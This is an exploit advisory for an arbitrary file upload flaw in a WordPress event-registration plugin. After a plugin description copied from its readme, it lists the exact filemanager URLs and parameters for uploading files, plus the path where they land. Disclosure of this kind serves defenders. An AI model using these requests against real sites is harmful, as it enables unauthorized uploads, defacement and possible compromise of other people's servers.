# Exploit Title : WordPress Event-Registration Plugins 5.43
Arbitrary File Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 30/03/2020
# Vendor Homepage : wp-event-organiser.com
# Software Links :
captainform.com/wordpress-event-registration-plugin/
wordpress.org/plugins/registrations-for-the-events-calendar/
edgetechweb.com
eventregistrationpro.com
# Software Version :
Requires at least: 2.0.2
Tested up to: 3.0.2
Software Affected Version : 5.42 - 5.43
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and
Access Controls ]
# PacketStormSecurity :
packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Description About Software :
*****************************
This plugin is designed to allow you to take online registrations
for events and classes.
Supports Paypal, Google Pay, MonsterPay or Authorize.net online
payment sites for online collection of event fees.
This wordpress plugin is designed to run on a Wordpress website and
provide registration events, classes, or parties.
It allows you to capture the registering persons contact
information and any additional infromation
you request to a database and provides an association to an events
database.
It provides the ability to send the register to either a Paypal,
Google Pay, Monster Pay,
or Authorize.net online payment site for online collection of event
fees.
Additionally it allows support for checks and cash payments.
Optional Captcha field on registration form.
Detailed payment management system to track and record event
payments.
Reporting features provide a export list(s) of events, attendees,
payments in excel or csv.
Events can be created in an Excel spreadsheet and uploaded via the
event upload tool.
Dashboard widget allows for quick reference to events from the
dashboard.
Inline menu navigation allows for ease of use.
== Installation ==
1. After unzipping, upload everything in the `Events
Registration`
folder to your `/wp-content/plugins/` directory (preserving
directory structure).
2. Activate the plugin through the 'Plugins' menu in WordPress.
3. Go to the Event Registration Menu and Configure Organization and
enter your company info -
note you will need a paypal id if you plan on accepting paypal
payments
4. Go to the Event Setup and create a new event, make sure you
select 'make active'.
5. Create a new page (not post) on your site. Put `{EVENTREGIS}` in
it on a line by itself.
6. Note: if you are upgradings from a previous version please
backup your data prior to upgrade.
####################################################################
# Impact :
***********
WordPress Event-Registration Plugins 5.43 is prone to a
vulnerability that lets attackers
upload arbitrary files because it fails to adequately sanitize
user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary
code and execute
it in the context of the webserver process. This may facilitate
unauthorized access
or privilege escalation; other attacks are also possible.
####################################################################
# Arbitrary File Upload / Unauthorized File Insert Exploit :
**************************************************
/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/frameset.php?a=b&js=mcFileManager.insertFileToForm&initial_path=mce_clear&initial_rootpath=mce_clear&remember=true
/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/frameset.php?a=b&js=mcFileManager.insertFileToForm&url=/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/Select%20file&initial_path=mce_clear&initial_rootpath=mce_clear&remember=true
/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/upload.php?path=/home/[DIRECTORY-NAME-HERE]/public_html/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/files
Valid extensions: gif, jpg, htm, html, pdf, zip
Max upload size: 10 MB
Directory File Path :
**********************
/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/files/[YOURFILENAME].html
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################
